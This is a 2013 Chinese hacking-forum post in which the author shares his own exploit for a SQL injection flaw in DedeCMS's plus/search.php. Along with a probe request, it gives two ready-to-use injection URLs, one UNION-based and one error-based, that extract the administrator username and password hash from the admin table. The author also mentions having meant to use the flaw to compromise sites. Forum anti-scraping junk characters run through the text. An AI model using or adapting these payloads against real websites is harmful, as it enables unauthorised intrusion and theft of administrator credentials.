找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1986|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ& T& M' k1 t% q. g: r
& L9 N( t, v/ Q' W
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
! ]5 }/ A* t3 ^% A  ~1 [. h& C/ L$ K& [* @
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。% M+ u! c* X$ w; _
- N1 D& w* ^, \# k( v- U) p% L
我一般是这样测试的:
3 u+ M5 ~  H2 t& A0 \  g. F3 d' w& y5 |8 a
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
, F/ E; z" M2 d; Y% Z
9 a# K( \  \9 a& X6 ?转载不加作者名的没JJ! {; Z4 o/ P; T' v. G6 x

+ O9 t8 C  O1 v4 f( L! n& f作者:鬼哥; g4 g1 I- g; D* A9 u
  H! h! h; ^- P: a+ S& D  W1 h
$ p  D6 M: }1 j3 W
1 M# ^( M5 X+ q' \+ p4 s& n
看结果如果提示
! U! G$ c0 Q" \. n* B' m- o/ t5 ]) X" K. Y& ?- `5 z
Safe Alert: Request Error step 2 !' J( f3 M1 u0 R1 N2 ^: q6 ]
& Z# i$ T3 U2 ^% C! Q" H
那么直接用下面的exp+ F, C2 q5 U5 e. u+ b" Y5 T* ?6 G
& n1 u% w, [+ z/ K% S& \
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
+ ]4 X3 Z0 P9 J" a( \
# G( T( _6 P& L5 c+ V: Q; a
, o& S) ]6 a+ p2 I# m: i4 p看结果如果提示
8 i+ m0 m; Q9 w1 l) P" D
) {- P2 X- `9 T: j  fSafe Alert: Request Error step 1 !# Z4 J  z$ l7 S5 Y

+ |5 m' ~  Q0 y- z- T; _1 Q% {. V那么直接用下面的exp' n1 e. p' b4 C: P6 C

7 J! R4 c5 G! ^* L$ y! t- \xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a& S3 T/ l7 W& ]

4 e5 h' b, B: ?0 k# w0 T- m% W7 p0 J+ ]/ o+ _( A# ]1 w: T$ `6 b
如果正常显示证明漏洞不存在了。
* _  }/ t2 d6 ^) t' W+ n( F/ t- \* g5 e( y! s! T- K7 q# i
转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表